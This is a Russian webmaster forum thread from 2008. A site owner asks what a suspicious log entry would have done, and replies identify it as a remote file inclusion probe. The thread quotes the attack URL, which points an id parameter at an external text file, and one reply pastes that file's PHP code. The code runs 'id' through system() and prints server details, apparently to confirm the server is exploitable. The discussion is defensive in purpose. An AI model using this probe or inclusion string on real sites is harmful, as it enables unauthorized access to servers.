Что бы было, если бы скрипт выполнился?

164

stalker37

10 ноября 2008, 13:42

600

Добрый день!

Сегодня в логах нашел запрос:

Date:[2008-11-10] --> 00:35:43 -- Klient:libwww-perl/5.803 -- IP:213.189.20.67 -- Page:index.php?id=http://www.easysupportdesk.com/cache/id.txt??? -- LastError:

А нормальный выглядит так:

Date:[2008-11-10] --> 02:37:53 -- Klient:Yandex/1.01.001 (compatible; Win16; I) -- IP:77.88.42.26 -- Page:index.php?id=help -- LastError:

Скрипт обрезает точки и еще некоторые символы, вот, видимо, поэтому скрипт и не запустился. Сам скрипт был в текстовом файле - http://www.easysupportdesk.com/cache/id.txt

Насколько я понял что он должен был либо что-то упереть с сайта, либо что-то добавить. Но что? Интересны Ваши мнения на этот счет.

Шаред и облачный хостинг, VPS (http://jino.ru/?par=stalker37)

386

dkameleon

10 ноября 2008, 13:57

#1

stalker37:
Насколько я понял что он должен был либо что-то упереть с сайта, либо что-то добавить. Но что? Интересны Ваши мнения на этот счет.

классический тест на ХСС. Инклюд с внешнего сайта.

Дизайн интерьера (http://balabukha.com/)

S

152

seolancer

10 ноября 2008, 14:03

#2

Это пытались шелл выполнить.

AE

14

Andy.Eko

10 ноября 2008, 16:03

#3

А вы наберите в браузере ссылку http://www.easysupportdesk.com/cache/id.txt посмотрите, обычненький такой скриптик. Ниче страшного там не происходит, но 100% после нахождения такой уязвимости последовал бы другой скрипт, в котором уже можно было делать все что угодно, может просто бы побаловались над сайтом

164

stalker37

10 ноября 2008, 17:18

#4

dkameleon, seolancer, ну вообщем я так и думал.

Andy.Eko, я смотрел, по некоторым моментам понял идею (хотя она и без просмотра ясна), просто хотелось узнать более точно.

86

tematika

10 ноября 2008, 22:20

#5

stalker37, Смотрели это файл? И антивирус не заорал? У меня нод пишет PHP/Zapchast.NAD - троян.

314

T.R.O.N

11 ноября 2008, 07:56

#6

stalker37:
Насколько я понял что он должен был либо что-то упереть с сайта, либо что-то добавить. Но что? Интересны Ваши мнения на этот счет.

Если сервер настроен правильно и в Вашем скрипте идет нормальная обработка GET запроса - ничего и никогда не произойдет. Скорее всего это стандартная дыра в како-то кривой CMS

От воздержания пока никто не умер. Хотя никто и не родился! Prototype.js был написан теми, кто не знает JavaScript, для тех, кто не знает JavaScript (Richard Cornford)

185

Anarchist

11 ноября 2008, 08:18

#7

T.R.O.N:
Скорее всего это стандартная дыра в како-то кривой CMS

и сайт ТС попал под тупой перебор сайтов на наличие этой CMS/скрипта и возможность использования дыры.

а может рефспам :) хотя вряд ли

48

zwer

11 ноября 2008, 08:32

#8

<?php

function ConvertBytes($number) {

$len = strlen($number);

if($len < 4) {

return sprintf("%d b", $number); }

if($len >= 4 && $len <=6) {

return sprintf("%0.2f Kb", $number/1024); }

if($len >= 7 && $len <=9) {

return sprintf("%0.2f Mb", $number/1024/1024); }

return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          



echo "Osirys<br>";

$un = @php_uname();

$id1 = system(id);

$pwd1 = @getcwd();

$free1= diskfreespace($pwd1);

$free = ConvertBytes(diskfreespace($pwd1));

if (!$free) {$free = 0;}

$all1= disk_total_space($pwd1);

$all = ConvertBytes(disk_total_space($pwd1));

if (!$all) {$all = 0;}

$used = ConvertBytes($all1-$free1);

$os = @PHP_OS;



echo "0sirys was here ..<br>";

echo "uname -a: $un<br>";

echo "os: $os<br>";

echo "id: $id1<br>";

echo "free: $free<br>";

echo "used: $used<br>";

echo "total: $all<br>";

exit;

На что орать то? Обычные параметры сервера смотрит ) Ну а потом уже как и писалось выше - Все что угодно запускается)

RD9.RU - Домены RU с поддержкой 90 рублей (http://rd9.ru/)

185

Anarchist

11 ноября 2008, 08:54

#9

zwer:
Обычные параметры сервера смотрит )

Видимо поэтому антивирус и называет его "запчасть" :D

Яндекс Вебмастер вынес товарные фиды в отдельный раздел

Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта